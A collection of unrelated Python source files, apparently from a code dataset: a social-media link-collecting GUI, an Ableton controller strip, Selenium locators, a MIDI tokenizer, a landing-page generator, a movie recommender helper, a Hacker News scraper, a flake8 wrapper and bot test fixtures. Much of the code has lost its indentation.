datetime.now().minute) + ".txt"
f = open(text, 'w')
a = 0
profile = instaloader.Profile.from_username(L.context, username)
posts = profile.get_posts()
print(username + " ---")
for post in posts:
if post.date > start and post.date > end:
pass
elif post.date >= start and post.date <= end:
a = 1
link = "https://www.instagram.com/p/" + post.shortcode + "/?utm_source=ig_web_copy_link"
f.write(link + "\n")
print("https://www.instagram.com/p/" + post.shortcode + "/?utm_source=ig_web_copy_link")
elif post.date <= start:
break
if a == 0:
f.close()
os.remove(text)
class twitterThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getTwitterlink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getTwitterlink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Twitter)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
            print(
                "Folder already exists. Please check it. If the error persists, delete the %s folder inside Senfonico Linkler and try again." % directoryFirst)
for username in list_username:
c = twint.Config()
c.Since = str(sYil) + "-" + str(sAy) + "-" + str(sGun)
c.Until = str(eYil) + "-" + str(eAy) + "-" + str(eGun)
c.Store_json = True
#c.User_id = 'randomstring'
c.Username = username
c.Output = username + ".json"
twint.run.Search(c)
if os.path.exists(username + ".json"):
text = path_directoryFirst + "/" + username + " " + str(datetime.now().hour) + "." + str(
datetime.now().minute) + ".txt"
f = open(text, 'w')
print("Linkler başarıyla alındı")
tweets = []
try:
for line in open(username + ".json", 'r', encoding='UTF-8'):
tweets.append(json.loads(line))
print(username)
for tweet in tweets:
f.write(tweet["link"] + "\n")
print(tweet["link"])
f.close()
except Exception as e:
print("Okumada bir hata oluştu. Lütfen sonradan yeniden dene.")
if os.path.exists(username + ".json"):
os.remove(username + ".json")
else:
print("Belirtilen aralıkta daha fazla link bulunmamaktadır.")
class facebookThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getFacebookLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getFacebookLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
start = datetime(sYil, sAy, sGun)
end = datetime(eYil, eAy, eGun)
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Facebook)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
            print(
                "Folder already exists. Please check it. If the error persists, delete the %s folder inside Senfonico Linkler and try again." % directoryFirst)
for i in list_username:
text = path_directoryFirst + "/" + i + " " +str(datetime.now().hour)+"."+str(datetime.now().minute) + ".txt"
f = open(text, 'w')
print(i)
a = 0
for post in get_posts(i, pages=50):
if start < post["time"] and post["time"] < end:
a = 1
f.write(post['post_url'] + "\n")
print(post['post_url'])
elif start > post["time"]:
f.close()
break
if a == 0:
os.remove(text)
class youtubeThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getYoutubeLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name)
def getYoutubeLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers):
api_key = "YOUR YOUTUBE API KEY"
youtube = build('youtube', 'v3', developerKey=api_key)
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Youtube)"
list_of_channel = allUsers.split(".")
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
            print(
                "Folder already exists. Please check it. If the error persists, delete the %s folder inside Senfonico Linkler and try again." % directoryFirst)
for channelID in list_of_channel:
text = path_directoryFirst + "/" + channelID+" " +str(datetime.now().hour)+"."+str(datetime.now().minute) + ".txt"
f = open(text, 'w')
request = youtube.search().list(
part='id,snippet',
channelId=channelID,
type='video',
order='date',
fields='nextPageToken,items(id,snippet)',
maxResults=50,
publishedAfter=str(sYil) + '-' + str(sAy) + '-' + str(sGun) + 'T00:00:00Z',
publishedBefore=str(eYil) + '-' + str(eAy) + '-' + str(eGun) + 'T00:00:00Z',
)
list_of_links = []
while request:
response = request.execute()
video_link_array = [f"https://www.youtube.com/watch?v={video['id']['videoId']}" \
for video in response['items']]
for videoLink in video_link_array:
list_of_links.append(videoLink)
request = youtube.search().list_next(
request, response)
print(channelID)
for link in list_of_links:
f.write(link + "\n")
print(link)
f.close()
size = os.path.getsize(text)
if size == 0:
os.remove(text)
class MainWindow(QObject):
def __init__(self):
QObject.__init__(self)
@Slot(str,str,str, str, str)
def toGetInstagramLink(self, name, dateStart , dateEnd, kullaniciAdi, sifre):
threadInstagram = instagramThread(name, dateStart, dateEnd, kullaniciAdi, sifre)
threadInstagram.start()
@Slot(str, str, str)
def toGetTwitterLink(self, name, dateStart, dateEnd):
threadTwitter = twitterThread(name, dateStart, dateEnd)
threadTwitter.start()
@Slot(str, str, str)
def toGetFacebookLink(self, name, dateStart, dateEnd):
threadFacebook = facebookThread(name, dateStart, dateEnd)
threadFacebook.start()
@Slot(str, str, str)
def toGetYoutubeLink(self, name, dateStart, dateEnd):
threadYoutube = youtubeThread(name, dateStart, dateEnd)
threadYoutube.start()
@Slot(str,str,str)
def toGetDownloadStory(self, name, kullaniciAdi,sifre):
threadStory = storyThread(name, kullaniciAdi,sifre)
threadStory.start()
if __name__ == "__main__":
app = QGuiApplication(sys.argv)
engine = QQmlApplicationEngine()
# Get Context
main = MainWindow()
engine.rootContext().setContextProperty("backend", main)
# Set App Extra Info
app.setOrganizationName("senfoni.co")
app.setOrganizationDomain("N/A")
# Set Icon
app.setWindowIcon(QIcon("senfonico_logo_siyah.ico"))
# Load Initial Window
engine.load(os.path.join(os.path.dirname(__file__), "main.qml"))
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
from _Framework.ButtonSliderElement import ButtonSliderElement
SLIDER_MODE_OFF = 0
SLIDER_MODE_TOGGLE = 1
SLIDER_MODE_SLIDER = 2
SLIDER_MODE_PRECISION_SLIDER = 3
SLIDER_MODE_SMALL_ENUM = 4
SLIDER_MODE_BIG_ENUM = 5
#TODO: repeat buttons.
# not exact / rounding values in slider and precision slider
class DeviceControllerStrip(ButtonSliderElement):
def __init__(self, buttons, control_surface, parent = None):
ButtonSliderElement.__init__(self, buttons)
self._control_surface = control_surface
self._parent = parent
self._num_buttons = len(buttons)
self._value_map = tuple([float(index) / (self._num_buttons-1) for index in range(self._num_buttons)])
self._precision_mode = False
self._enabled = True
def set_enabled(self,enabled):
self._enabled = enabled
def set_precision_mode(self, precision_mode):
self._precision_mode = precision_mode
self.update()
@property
def _value(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.value
else:
return 0
@property
def _max(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.max
else:
return 0
@property
def _min(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.min
else:
return 0
@property
def _range(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.max - self._parameter_to_map_to.min
else:
return 0
@property
def _default_value(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to._default_value
else:
return 0
@property
def _is_quantized(self):
if self._parameter_to_map_to != None:
return self._parameter_to_map_to.is_quantized
else:
return False
@property
def _mode(self):
if self._parameter_to_map_to != None:
if self._is_quantized:
if self._range == 1:
return SLIDER_MODE_TOGGLE
elif self._range<=self._num_buttons:
return SLIDER_MODE_SMALL_ENUM
else:
return SLIDER_MODE_BIG_ENUM
else:
if self._precision_mode:
return SLIDER_MODE_PRECISION_SLIDER
else:
return SLIDER_MODE_SLIDER
else:
return SLIDER_MODE_OFF
def update(self):
if self._enabled:
if self._mode == SLIDER_MODE_TOGGLE:
self._update_toggle()
elif self._mode == SLIDER_MODE_SMALL_ENUM:
self._update_small_enum()
elif self._mode == SLIDER_MODE_BIG_ENUM:
self._update_big_enum()
elif (self._mode == SLIDER_MODE_SLIDER):
self._update_slider()
elif (self._mode == SLIDER_MODE_PRECISION_SLIDER):
self._update_precision_slider()
else:
self._update_off()
def reset(self):
self._update_off()
def reset_if_no_parameter(self):
if self._parameter_to_map_to == None:
self.reset()
def _update_off(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
self._update_buttons(tuple(v))
def _update_toggle(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value==self._max:
v[0]="Device.Toggle.On"
else:
v[0]="Device.Toggle.Off"
self._update_buttons(tuple(v))
def _update_small_enum(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
for index in range(int(self._range+1)):
if self._value==index+self._min:
v[index]="Device.Enum.On"
else:
v[index]="Device.Enum.Off"
self._update_buttons(tuple(v))
def _update_big_enum(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value>self._min:
v[3]="Device.BigEnum.On"
else:
v[3]="Device.BigEnum.Off"
if self._value<self._max:
v[4]="Device.BigEnum.On"
else:
v[4]="Device.BigEnum.Off"
self._update_buttons(tuple(v))
def _update_slider(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
for index in range(len(self._buttons)):
if self._value >=self._value_map[index]*self._range+self._min:
v[index]="Device.Slider.On"
else:
v[index]="Device.Slider.Off"
self._update_buttons(tuple(v))
def _update_precision_slider(self):
v = ["DefaultButton.Disabled" for index in range(len(self._buttons))]
if self._value>self._min:
v[3]="Device.PrecisionSlider.On"
else:
v[3]="Device.PrecisionSlider.Off"
if self._value<self._max:
v[4]="Device.PrecisionSlider.On"
else:
v[4]="Device.PrecisionSlider.Off"
self._update_buttons(tuple(v))
def _update_buttons(self, buttons):
assert isinstance(buttons, tuple)
assert (len(buttons) == len(self._buttons))
        for index in range(len(self._buttons)):
            self._buttons[index].set_on_off_values(buttons[index], buttons[index])
            # on and off skin values are identical here, so turning the button on
            # always applies the requested value (the original `buttons[index] > 0`
            # compared a str with an int, which raises TypeError on Python 3)
            self._buttons[index].turn_on()
def _button_value(self, value, sender):
assert isinstance(value, int)
assert (sender in self._buttons)
self._last_sent_value = -1
if (self._parameter_to_map_to != None and self._enabled and ((value != 0) or (not sender.is_momentary()))):
if (value != self._last_sent_value):
index_of_sender = list(self._buttons).index(sender)
if (self._mode == SLIDER_MODE_TOGGLE) and index_of_sender==0:
if self._value == self._max:
self._parameter_to_map_to.value = self._min
else:
self._parameter_to_map_to.value = self._max
elif self._mode == SLIDER_MODE_SMALL_ENUM:
self._parameter_to_map_to.value = index_of_sender + self._min
elif self._mode == SLIDER_MODE_BIG_ENUM:
if index_of_sender>=4:
inc = 2**(index_of_sender - 3 -1)
if self._value + inc <= self._max:
self._parameter_to_map_to.value += inc
else:
self._parameter_to_map_to.value = self._max
else:
inc = 2**(4 - index_of_sender -1)
if self._value - inc >= self._min:
self._parameter_to_map_to.value -= inc
else:
self._parameter_to_map_to.value = self._min
elif (self._mode == SLIDER_MODE_SLIDER):
self._parameter_to_map_to.value = self._value_map[index_of_sender]*self._range + self._min
elif (self._mode == SLIDER_MODE_PRECISION_SLIDER):
inc = float(self._range) / 128
if self._range>7 and inc<1:
inc=1
if index_of_sender >= 4:
inc = inc * 2**(index_of_sender - 3-1)
if self._value + inc <= self._max:
self._parameter_to_map_to.value += inc
else:
self._parameter_to_map_to.value = self._max
else:
inc = inc * 2**(4 - index_of_sender-1)
if self._value - inc >= self._min:
self._parameter_to_map_to.value -= inc
else:
self._parameter_to_map_to.value = self._min
self.notify_value(value)
if self._parent is not None:
self._parent._update_OSD()
def _on_parameter_changed(self):
assert (self._parameter_to_map_to != None)
if self._parent is not None:
self._parent._update_OSD()
self.update()
|
nilq/baby-python
|
python
|
from selenium.webdriver.common.by import By
class MainPageLocators():
SEARCH_STRING = (By.ID, 'text')
SUGGEST = (By.CSS_SELECTOR, '[role=listbox]')
IMAGES = (By.CSS_SELECTOR, '[data-statlog="services_new.item.images.2"]')
class ResultPageLocators():
FIRST_RESULT = (By.CSS_SELECTOR, '[data-cid="0"] .organic__path b')
NEXT_RESULTS = (By.CSS_SELECTOR, '.Organic-Path b')
class ImagePageLocators():
CATEGORY = (By.CSS_SELECTOR, '.PopularRequestList-Item_pos_0')
CATEGORY_NAME = (By.CSS_SELECTOR, '.PopularRequestList-SearchText')
TEXT_IN_SEARCH_STRING = (By.CSS_SELECTOR, '.input__box input')
FIRST_IMAGE = (By.CSS_SELECTOR, '.serp-item__preview')
IMAGE_DATA = (By.CSS_SELECTOR, '.MMImage-Origin')
NEXT_IMAGE_BUTTON = (By.CSS_SELECTOR, '.CircleButton_type_next')
PREVIOUS_IMAGE_BUTTON = (By.CSS_SELECTOR, '.CircleButton_type_prev')
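if __name__ == "__main__":
    # Usage sketch (illustration only): locator tuples unpack straight into
    # Selenium's find_element. Assumes a working Firefox/geckodriver setup and
    # that these locators target Yandex pages (inferred from the selectors).
    from selenium import webdriver

    driver = webdriver.Firefox()
    try:
        driver.get("https://yandex.ru")
        driver.find_element(*MainPageLocators.SEARCH_STRING).send_keys("weather")
    finally:
        driver.quit()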
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
def env_or_default(name, d):
from os import environ
try:
a = environ[name]
if a:
return type(d)(a)
else:
return d
except Exception:
return d
def print_stats(steps, t_diff, dl):
from time import strftime
print(
'{:s} | stp: {:d} time: {:.5f} v: {:d} e: {:d}'.format(
strftime('%d/%m/%Y %H:%M:%S'),
steps,
t_diff,
dl.get_vnum(),
dl.get_enum()
)
)
return
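if __name__ == '__main__':
    # Usage sketch (illustration only): the default's type drives the coercion
    # in env_or_default, so with PORT=8080 set in the environment this prints
    # the int 8080, and the int 3000 when the variable is unset or empty.
    print(env_or_default('PORT', 3000))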
|
nilq/baby-python
|
python
|
import glob, os, numpy
from music21 import converter, instrument, note, chord
from itertools import chain
import json
import pickle
PATH = '../Bach-Two_Part_Inventions_MIDI_Transposed/txt'
OUTPUT_PATH = '../Bach-Two_Part_Inventions_MIDI_Transposed/txt_tokenized'
CHUNK_SIZE = 4 # MEASURES
def write_pickle(filename, obj):
with open(filename, 'wb') as f:
pickle.dump(obj, f, protocol=pickle.HIGHEST_PROTOCOL)
def read_pickle(filename):
    with open(filename, 'rb') as f:  # pickle files must be opened in binary mode
        return pickle.load(f)
def generate_duration_tokens(directory):
symbols = set()
for file in glob.glob(os.path.join(directory, '*.txt')):
#print(file)
with open(file) as f:
for line in f:
tokens = line.strip().split(' ')
for i, token in enumerate(tokens):
# Skip MIDI or REST tokens
if i % 2 == 0:
continue
symbols.add(token)
symbol_list = sorted(symbols)
symbol_to_index = {s: idx for idx,s in enumerate(symbol_list)}
index_to_symbol = {idx: s for idx,s in enumerate(symbol_list)}
return symbol_to_index, index_to_symbol
def simplify_text(directory, output_directory, symbol_to_index):
    for file in glob.glob(os.path.join(directory, '*.txt')):
        #print(file)
        output_filename = os.path.join(output_directory, os.path.basename(file))
with open(file) as f:
with open(output_filename, 'w') as outfile:
for line in f:
line_out = []
tokens = line.strip().split(' ')
for i, token in enumerate(tokens):
# Don't tokenize MIDI or REST tokens
if i % 2 == 0:
line_out.append(token)
else:
line_out.append(str(symbol_to_index[token]))
outfile.write(' '.join(line_out) + '\n')
if __name__ == '__main__':
symbol_to_index, index_to_symbol = generate_duration_tokens(PATH)
print (symbol_to_index)
simplify_text(PATH, OUTPUT_PATH, symbol_to_index)
write_pickle(os.path.join(OUTPUT_PATH, 'symbol_to_index.pkl'), symbol_to_index)
print('DONE!')
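# Illustration (hypothetical data format): if a line in an input file reads
#   "60 quarter 62 eighth"
# then generate_duration_tokens collects {'eighth', 'quarter'} and, with
# symbol_to_index == {'eighth': 0, 'quarter': 1}, simplify_text writes
#   "60 1 62 0"
# i.e. pitches are kept verbatim and only duration tokens are index-encoded.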
|
nilq/baby-python
|
python
|
import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Learn To Code Pakistan will help you master the art of programming for free!">
<meta name="author" content="">
<title>Learn To Code Pakistan</title>
<!-- Bootstrap core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom fonts for this template -->
<link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Merriweather:400,300,300italic,400italic,700,700italic,900,900italic' rel='stylesheet' type='text/css'>
<!-- Plugin CSS -->
<link href="vendor/magnific-popup/magnific-popup.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="css/creative.min.css" rel="stylesheet">
</head>
<body id="page-top">
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-light fixed-top" id="mainNav">
<div class="container">
<a class="navbar-brand js-scroll-trigger" href="#page-top">Learn To Code Pakistan</a>
<button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarResponsive">
<ul class="navbar-nav ml-auto">
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#about">About</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#services">What We Offer?</a>
</li>
<li class="nav-item">
<a class="nav-link js-scroll-trigger" href="#contact">Instructor?</a>
</li>
</ul>
</div>
</div>
</nav>
<header class="masthead text-center text-white d-flex">
<div class="container my-auto">
<div class="row">
<div class="col-lg-10 mx-auto">
<h1 class="text-uppercase">
<strong>Your One Stop For Programming Tutorials</strong>
</h1>
<hr>
</div>
<div class="col-lg-8 mx-auto">
<a class="btn btn-primary btn-xl js-scroll-trigger" href="#about">What's inside?</a>
</div>
</div>
</div>
</header>
<section class="bg-primary" id="about">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading text-white">We've got what you need!</h2>
<hr class="light my-4">
<p class="text-faded mb-4">From Python Tutorials which will help become the master of Data Science to C++ and Unity for object oriented programming to make advanced games, our website is the has all! </p>
<a class="btn btn-light btn-xl js-scroll-trigger" href="#services">Take a look!</a>
</div>
</div>
</div>
</section>
<section id="services">
<div class="container">
<div class="row">
<div class="col-lg-12 text-center">
<h2 class="section-heading">What We Offer?</h2>
<hr class="my-4">
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-diamond text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">No Ads!</h3>
<p class="text-muted mb-0">We use cryptocurrency mining to keep our website funded, no pesky ads allowed!</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-video-camera text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Video Tutorials</h3>
<p class="text-muted mb-0">Our instructors are highly qualified individuals which will explain each and everything with examples and much more for a fun learning experience!</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-user text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Are You An Instructor?</h3>
<p class="text-muted mb-0">Use the contact options below and we will get your tutorials up on our website ASAP</p>
</div>
</div>
<div class="col-lg-3 col-md-6 text-center">
<div class="service-box mt-5 mx-auto">
<i class="fa fa-4x fa-file-text text-primary mb-3 sr-icons"></i>
<h3 class="mb-3">Quizzes</h3>
<p class="text-muted mb-0">No learning experience is complete without the final evaluation, our quizzes are designed to make you ponder and understand the fundamentals of the course you are taking.</p>
</div>
</div>
</div>
</div>
</section>
<section class="bg-dark text-white">
<div class="container text-center">
<h2 class="mb-4">Ready to Learn?</h2>
<a class="btn btn-light btn-xl sr-button" href="file:///D:/Downloads/update 11-1-2018/proj/startbootstrap-creative-gh-pages/learntocode.html">Take Your First Course!</a>
</div>
</section>
<section id="contact">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading">Instructor?</h2>
<hr class="my-4">
<p class="mb-5">Ready to start your next project with us? That's great! Give us a call or send us an email and we will get back to you as soon as possible!</p>
</div>
</div>
<div class="row">
<div class="col-lg-4 ml-auto text-center">
<i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
<p>03365545494</p>
</div>
<div class="col-lg-4 mr-auto text-center">
<i class="fa fa-envelope-o fa-3x mb-3 sr-contact"></i>
<p>
<a href="mailto:instructor@learntocode.pk">instructor@learntocode.pk</a>
</p>
</div>
</div>
</div>
</section>
<!-- Bootstrap core JavaScript -->
<script src="vendor/jquery/jquery.min.js"></script>
<script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<!-- Plugin JavaScript -->
<script src="vendor/jquery-easing/jquery.easing.min.js"></script>
<script src="vendor/scrollreveal/scrollreveal.min.js"></script>
<script src="vendor/magnific-popup/jquery.magnific-popup.min.js"></script>
<!-- Custom scripts for this template -->
<script src="js/creative.min.js"></script>
</body>
</html>
'''
def homepage():
    # Create or overwrite the output file and write the page
    with open('homepage.html', 'w') as output_file:
        output_file.write(main_page_head)
    # open the output file in the browser (in a new tab, if possible)
    url = os.path.abspath(output_file.name)
    webbrowser.open('file://' + url, new=2)
homepage()
|
nilq/baby-python
|
python
|
# demo - opencv
import cv2
# Load the image in color: flag 1 = color, flag 0 = grayscale
# (the original comment said grayscale, but flag 1 loads color)
img = cv2.imread('lotus.jpg', 1)
cv2.imshow('lotus', img)
cv2.waitKey(0)  # wait indefinitely for a key press
# cv2.waitKey(2000)  # or wait at most 2 seconds
cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
'''
import data here and have utility functions that could help
'''
import pandas as pd
import pickle
from thefuzz import fuzz, process
ratings = pd.read_csv('./data/ml-latest-small/ratings.csv')
movies = pd.read_csv('./data/ml-latest-small/movies.csv')
# import nmf model
with open('./nmf_recommender.pkl', 'rb') as file:
nmf_model = pickle.load(file)
# import neighborhood model
with open('./neighbors_recommender.pkl', 'rb') as file:
neighbor_model = pickle.load(file)
def movie_title_search(fuzzy_titles):
    '''
    does a fuzzy search and returns the best-matched movie titles
    '''
    extracted_titles = []
    choices = movies['title'].tolist()
    for fuzzy_title in fuzzy_titles:
        extracted_title = process.extract(fuzzy_title, choices, limit=1)
        extracted_title = extracted_title[0][0]
        extracted_titles.append(extracted_title)
    return extracted_titles  # return the full list rather than only the last match
def movie_to_id(extracted_titles):
'''
converts movie title to id for use in algorithms
'''
movieId = movies.set_index('title').loc[extracted_titles].movieId
movieId = movieId.tolist()
return movieId
def id_to_movie_title(movieId):
'''
converts movie Id to title
'''
title_genre_df = movies.set_index('movieId').loc[movieId]
recommendations_title = title_genre_df.title
return recommendations_title
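if __name__ == '__main__':
    # Usage sketch (illustration only; assumes the CSVs and pickled models
    # referenced above are present): chain the helpers to round-trip from
    # fuzzy user input to canonical titles. 'Toy Stroy' is a deliberate typo.
    titles = movie_title_search(['Toy Stroy'])
    ids = movie_to_id(titles)
    print(id_to_movie_title(ids))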
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
import requests
import pprint
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'}
base_url = 'https://news.ycombinator.com/news'
response = requests.get(base_url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
with open('hacker_news.html', 'w') as file:
file.write(soup.prettify())
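# NOTE: these class names ('.storylink', '.subtext', '.score') match Hacker News
# markup at the time of writing; the site's markup changes occasionally, so the
# selectors may need updating.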
links = soup.select('.storylink')
sub_text = soup.select('.subtext')
def sort_by_votes(hnlist):
    # sort stories by votes in descending order
    return sorted(hnlist, key=lambda k: k['votes'], reverse=True)
def create_custom_hacker_news(links, sub_text):
hn = []
for index, item in enumerate(links):
vote = sub_text[index].select('.score')
if len(vote):
points = int(vote[0].getText().strip(' points'))
if points > 150:
title = links[index].getText()
href = links[index].get('href', None)
hn.append({'title':title,'href':href,'votes':points})
return sort_by_votes(hn)
if __name__ == "__main__":
custom_hn_lists = create_custom_hacker_news(links, sub_text)
pprint.pprint(custom_hn_lists)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
#
# __main__.py
"""
CLI entry point.
"""
#
# Copyright (c) 2020 Dominic Davis-Foster <dominic@davis-foster.co.uk>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# stdlib
import sys
# 3rd party
import click
from consolekit import CONTEXT_SETTINGS
# this package
from flake8_prettycount.application import Application
__all__ = ["main"]
@click.command(context_settings={"ignore_unknown_options": True, "allow_extra_args": True, **CONTEXT_SETTINGS})
@click.pass_context
def main(ctx: click.Context):
"""
Wrapper around flake8 providing a formatted count at the end.
All options and arguments are passed through to flake8.
"""
app = Application()
app.run(ctx.args[:])
app.exit()
if __name__ == "__main__":
sys.exit(main(obj={}))
|
nilq/baby-python
|
python
|
from typing import Any, Union
from bot.event import Event, EventType
from pydantic.utils import deep_update
def event(
event_data: Union[str, dict[str, Any]],
event_type: EventType = EventType.NEW_MESSAGE,
) -> Event:
default = {
"chat": {"chatId": "test"},
"from": "someone@mail.ru",
"msgId": 999,
}
if isinstance(event_data, str):
# for simple cases
default["text"] = event_data
else:
default = deep_update(default, event_data)
return Event(event_type, default)
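# Illustration: event("hi") merges {"text": "hi"} into the defaults above, while
# event({"chat": {"chatId": "other"}}) deep-merges nested keys via deep_update
# instead of replacing the whole "chat" dict.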
def part(type: str, **payload: Any) -> dict[str, Any]:
return {"type": type, "payload": payload}
def mention(user_id: int) -> dict[str, Any]:
return part("mention", userId=user_id)
def odesli_response() -> dict[str, Any]:
return {
"entityUniqueId": "ITUNES_SONG::1443109064",
"userCountry": "US",
"pageUrl": "https://song.link/us/i/1443109064",
"entitiesByUniqueId": {
"ITUNES_SONG::1443109064": {
"id": "1443109064",
"type": "song",
"title": "Kitchen",
"artistName": "Kid Cudi",
"thumbnailUrl": "https://is4-ssl.mzstatic.com/image/thumb/Music118/v4/ac/2c/60/ac2c60ad-14c3-a8b2-d962-dc08de2da546/source/512x512bb.jpg",
"thumbnailWidth": 512,
"thumbnailHeight": 512,
"apiProvider": "itunes",
"platforms": ["appleMusic", "itunes"],
},
},
"linksByPlatform": {
"appleMusic": {
"url": "https://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"nativeAppUriMobile": "music://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"nativeAppUriDesktop": "itms://music.apple.com/us/album/kitchen/1443108737?i=1443109064&uo=4&app=music&ls=1&at=1000lHKX",
"entityUniqueId": "ITUNES_SONG::1443109064",
},
"spotify": {
"url": "https://open.spotify.com/track/0Jcij1eWd5bDMU5iPbxe2i",
"nativeAppUriDesktop": "spotify:track:0Jcij1eWd5bDMU5iPbxe2i",
"entityUniqueId": "SPOTIFY_SONG::0Jcij1eWd5bDMU5iPbxe2i",
},
